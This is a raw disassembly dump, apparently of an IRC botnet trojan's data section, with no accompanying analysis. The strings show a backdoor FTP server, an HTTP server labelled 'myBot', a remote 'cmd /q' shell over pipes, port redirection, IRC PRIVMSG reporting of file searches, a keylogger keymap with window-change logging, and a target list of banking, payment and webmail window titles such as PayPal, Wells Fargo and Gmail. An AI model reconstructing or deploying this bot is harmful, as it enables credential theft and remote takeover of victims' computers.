aType db 'TYPE',0 ; DATA XREF: sub_40F3AA:loc_40F6B3�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40F3AA+2FE�o
align 4
; char off_43492C[]
off_43492C dd offset dword_445750 ; DATA XREF: sub_40F3AA+2EA�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40F3AA+2DD�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_40F3AA+2C9�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40F3AA+2BC�o
align 4
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_40F3AA+2A8�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40F3AA+29B�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_40F3AA+287�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40F3AA+277�o
align 4
; char aUser_1[]
aUser_1 db 'USER',0 ; DATA XREF: sub_40F3AA+262�o
align 4
; char aSS_3[]
aSS_3 db '%s %s',0 ; DATA XREF: sub_40F3AA+251�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40F3AA+1C9�o
align 4
; char asc_4349C4[]
asc_4349C4 db '-' ; DATA XREF: sub_40FAD6+3F8�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
; char asc_4349EC[]
asc_4349EC db 0Dh,0Ah,0 ; DATA XREF: sub_40FAD6+2CF�o
; sub_41AA1E+F5�o
align 10h
; char aGet_0[]
aGet_0 db 'GET ',0 ; DATA XREF: sub_40FAD6+269�o
align 4
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FF31+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHttp1_0200OkSe[]
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FF31+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40FF31+98�o
; sub_41AF8F+1AE�o
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40FF31+84�o
align 4
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40FF31:loc_40FF97�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_40FF31+5F�o
align 4
; char asc_434C0C[]
asc_434C0C db '-' ; DATA XREF: sub_4100B4+296�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_34 db ' failed to start worker thread, error %d',0
align 4
; char asc_434C44[]
asc_434C44 db '-' ; DATA XREF: sub_4100B4+212�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 4
; char asc_434C78[]
asc_434C78 db '*',0 ; DATA XREF: sub_4100B4+15A�o
align 4
aS_9 db '\%s',0 ; DATA XREF: sub_4100B4+2F�o
; char aFoundIFilesAnd[]
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_41036B+652�o
align 4
; char aTrTdColspan3_0[]
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
; char aPrivmsgSFoundS[]
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_41036B+61C�o
align 10h
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_41036B+58D�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_41036B+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_41036B:loc_410893�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_41036B+521�o
align 4
; char aPrivmsgS31s2_0[]
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_41036B+46E�o
align 4
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_41036B+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_41036B:loc_410725�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_41036B+3B3�o
align 4
; char aSS_4[]
aSS_4 db '%s%s/',0 ; DATA XREF: sub_41036B+36C�o
align 4
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+328�o
; sub_41036B+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_41036B+310�o
align 4
; char aS_2[]
aS_2 db '<%s>',0 ; DATA XREF: sub_41036B+2E9�o
; sub_41036B+40B�o
align 10h
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_41036B+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_41036B+295�o
align 4
aPm_0 db 'PM',0 ; DATA XREF: sub_41036B+28A�o
align 4
; char a__[]
a__ db '..',0 ; DATA XREF: sub_41036B+237�o
align 4
; char aTrTdColspan3AH[]
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aSearchingForS[]
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+149�o
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aTrTdWidthDCode[]
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aH1IndexOfSH1Ta[]
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_41036B+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
; char aHtmlHeadTitleI[]
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_41036B+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
; char aPrivmsgSSearch[]
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+4B�o
; char aSSHttp1_1Refer[]
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_410ADC+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
; char asc_435120[]
asc_435120 db '-' ; DATA XREF: sub_410BFD+171�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerFailed_0 db '- server failed, returned %d',0
align 4
; char aUseridUnixS[]
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_410BFD+116�o
; char asc_435164[]
asc_435164 db '-' ; DATA XREF: sub_410BFD+BB�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aClientConnecti db '- client connection from %s:%d.',0
; char asc_435190[]
asc_435190 db '-' ; DATA XREF: sub_410DAB+15E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_35 db 'Failed to start client thread, error: <%d>.',0
; char asc_4351CC[]
asc_4351CC db '-' ; DATA XREF: sub_410DAB+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char asc_435214[]
asc_435214 db '-' ; DATA XREF: sub_410F3C+1AA�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_36 db 'Failed to start connection thread, error: <%d>.',0
; char asc_435254[]
asc_435254 db '-' ; DATA XREF: sub_410F3C+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
; char asc_435298[]
asc_435298 db '-' ; DATA XREF: sub_4111C0+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
; char asc_4352C4[]
asc_4352C4 db '-' ; DATA XREF: sub_4111C0+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 10h
; char asc_4352F0[]
asc_4352F0 db '-' ; DATA XREF: sub_4111C0+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4111C0+172�o
align 4
; char asc_43532C[]
asc_43532C db '-' ; DATA XREF: sub_4111C0+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 4
; char asc_435358[]
asc_435358 db '-' ; DATA XREF: sub_4113C5:loc_41140A�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
; char asc_435384[]
asc_435384 db '-' ; DATA XREF: sub_41141F+1B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
; char asc_4353BC[]
asc_4353BC db '-' ; DATA XREF: sub_41144E+219�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
; char asc_4353F4[]
asc_4353F4 db '-' ; DATA XREF: sub_41144E+1FB�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_37 db '- Failed to start client thread, error: <%d>.',0
align 10h
; char asc_435430[]
asc_435430 db '-' ; DATA XREF: sub_41144E+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
unk_435474 db 2Dh ; - ; DATA XREF: sub_41144E+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 10h
; char asc_4354B0[]
asc_4354B0 db '-' ; DATA XREF: sub_41144E+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
; char asc_4354F4[]
asc_4354F4 db '-' ; DATA XREF: sub_41144E+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 10h
; char asc_435520[]
asc_435520 db '-' ; DATA XREF: sub_4116D6+DE�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 4
; char asc_435554[]
asc_435554 db '-' ; DATA XREF: sub_4116D6+59�o
; sub_4116D6+8B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
unk_43559C db 2Dh ; - ; DATA XREF: sub_411827+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
; char asc_4355C4[]
asc_4355C4 db '-' ; DATA XREF: sub_411827+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 4
unk_435604 db 2Dh ; - ; DATA XREF: sub_411827+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
; char asc_435644[]
asc_435644 db '-' ; DATA XREF: sub_411920+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_411920+8C�o
align 4
; char asc_435684[]
asc_435684 db '-' ; DATA XREF: sub_4119F9+A1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
; char asc_4356C0[]
asc_4356C0 db '-' ; DATA XREF: sub_411BCE+1B2�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_38 db '- Failed to start server on Port %d.',0
align 4
; char asc_4356F4[]
asc_4356F4 db '-' ; DATA XREF: sub_411BCE+18F�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_39 db '- Failed to start client thread, error: <%d>.',0
align 10h
; char asc_435730[]
asc_435730 db '-' ; DATA XREF: sub_411BCE+114�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char dword_435774[]
dword_435774 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
; char dword_4357B8[]
dword_4357B8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 4
; char dword_4357F8[]
dword_4357F8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 4
dword_435838 dd 4000500h, 7868746Bh, 2 dup(0) ; DATA XREF: sub_412197+404�o
; char aEGold[]
aEGold db 'e-gold',0 ; DATA XREF: sub_4125FC+13�o
align 10h
dd 1Eh dup(0)
aSignIn db 'Sign In',0
dd 1Eh dup(0)
aHotmail db 'Hotmail',0
dd 1Eh dup(0)
aWindowsLiveMes db 'Windows Live Messenger',0
align 10h
dd 1Ah dup(0)
aPaypal_1 db 'PayPal',0
align 10h
dd 1Eh dup(0)
aStormpay db 'StormPay',0
align 4
dd 1Dh dup(0)
aStormpay_comAc db 'StormPay.com, Accept Online Payments',0
align 10h
dd 16h dup(0)
aWorldpay db 'WorldPay',0
align 4
dd 1Dh dup(0)
aPosteItaliane db 'Poste Italiane',0
align 4
dd 1Ch dup(0)
aFotolog_net db 'Fotolog.net',0
dd 1Dh dup(0)
aTerraFotolog db 'Terra - Fotolog',0
dd 1Ch dup(0)
aYahoo db 'Yahoo!',0
align 10h
dd 1Eh dup(0)
aDomainSearch db 'Domain Search',0
align 4
dd 1Ch dup(0)
aBienvenidoAGma db 'Bienvenido a Gmail',0
align 4
dd 1Bh dup(0)
aWelcomeToGmail db 'Welcome to Gmail',0
align 4
dd 1Bh dup(0)
aDomainNameRegi db 'Domain Name Registration',0
align 4
dd 19h dup(0)
aDomainName db 'Domain Name',0
dd 1Dh dup(0)
aMyAccountLogin db 'My Account Login',0
align 4
dd 1Bh dup(0)
aMercadolivreBr db 'MercadoLivre Brasil',0
dd 1Bh dup(0)
aWellsFargoHome db 'Wells Fargo Home Page',0
align 10h
dd 1Ah dup(0)
aRyan1918DontNe db 'Ryan1918 Dont NET :: Log in',0
dd 19h dup(0)
aEbay db 'eBay',0
align 10h
dd 1Eh dup(0)
aEbayNewUsedEle db 'eBay - New & used electronics, cars, apparel, collectibles, sport'
db 'ing goods & more at low prices',0
dd 8 dup(0)
db 49h ; I
db 6Eh, 69h, 63h
db 69h ; i
db 61h, 72h, 20h
db 73h ; s
db 65h, 73h, 69h
db 0F3h ; ó
aNebayNewUsedEl db 'neBay - New & used electronics, cars, apparel, collectibles, spor'
db 'ting goods & more at low prices',0
align 4
dd 4 dup(0)
dword_436448 dd 8 ; DATA XREF: sub_4125FC+65�o
dword_43644C dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_4126A7:loc_412925�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 41000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_436B7C dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4126A7+48F�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
; char aSS_5[]
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_4125FC+31�o
; sub_41AF8F+EB�o
; char a__S_l_ReturnS[]
a__S_l_ReturnS db '.».%s.«. (Return) (%s)',0 ; DATA XREF: sub_4126A7+3FA�o
align 4
; char a__S_l_Return[]
a__S_l_Return db '.».%s.«. (Return)',0 ; DATA XREF: sub_4126A7+3D9�o
align 4
a__S_l_Buffer_0 db '.».%s.«. (Buffer full) (%s)',0 ; DATA XREF: sub_4126A7+394�o
a__S_l_BufferFu db '.».%s.«. (Buffer full)',0 ; DATA XREF: sub_4126A7+382�o
align 4
; char a__S_l_ChangedW[]
a__S_l_ChangedW db '.».%s.«. (Changed Windows: %s)',0 ; DATA XREF: sub_4126A7+17B�o
align 4
; char a__S_l_[]
a__S_l_ db '.».%s.«.',0 ; DATA XREF: sub_4126A7+B9�o
; sub_4126A7+145�o ...
align 4
off_436C48 dd offset dword_4374C0 ; DATA XREF: sub_412B61+2B9�r
dd offset off_4374BC
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
; char a_login[]
a_login db ':.login',0 ; DATA XREF: sub_412B61+1DE�o
dd 3 dup(0)
dword_436C6C dd 0 ; DATA XREF: sub_412B61+2B2�r
aLogin_2 db ':,login',0
dd 4 dup(0)
aLogin_3 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_4 db ':$login',0
dd 4 dup(0)
aLogin_5 db ':%login',0
dd 4 dup(0)
aLogin_6 db ':^login',0
dd 4 dup(0)
aLogin_7 db ':&login',0
dd 4 dup(0)
aLogin_8 db ':*login',0
dd 4 dup(0)
aLogin_9 db ':-login',0
dd 4 dup(0)
aLogin_10 db ':+login',0
dd 4 dup(0)
aLogin_11 db ':/login',0
dd 4 dup(0)
aLogin_12 db ':\login',0
dd 4 dup(0)
aLogin_13 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_14 db ':',27h,'login',0
dd 4 dup(0)
aLogin_15 db ':`login',0
dd 4 dup(0)
aLogin_16 db ':~login',0
dd 4 dup(0)
aLogin_17 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 4
dd 4 dup(0)
aAuth db ':,auth',0
align 10h
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 4
dd 4 dup(0)
a@auth db ':@auth',0
align 10h
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 4
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 10h
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 4
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 10h
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 4
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 10h
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 4
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 10h
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 4
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 10h
dd 4 dup(0)
a?auth db ':?auth',0
align 4
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 10h
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 4
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 10h
dd 4 dup(0)
aAuth_14 db ': auth',0
align 4
dd 4 dup(0)
a_id db ':.id',0
align 10h
dd 4 dup(0)
aId_0 db ':,id',0
align 4
dd 4 dup(0)
aId_1 db ':!id',0
align 10h
dd 4 dup(0)
a@id db ':@id',0
align 4
dd 4 dup(0)
aId_2 db ':$id',0
align 10h
dd 4 dup(0)
aId_3 db ':%id',0
align 4
dd 4 dup(0)
aId_4 db ':^id',0
align 10h
dd 4 dup(0)
aId_5 db ':&id',0
align 4
dd 4 dup(0)
aId_6 db ':*id',0
align 10h
dd 4 dup(0)
aId_7 db ':-id',0
align 4
dd 4 dup(0)
aId_8 db ':+id',0
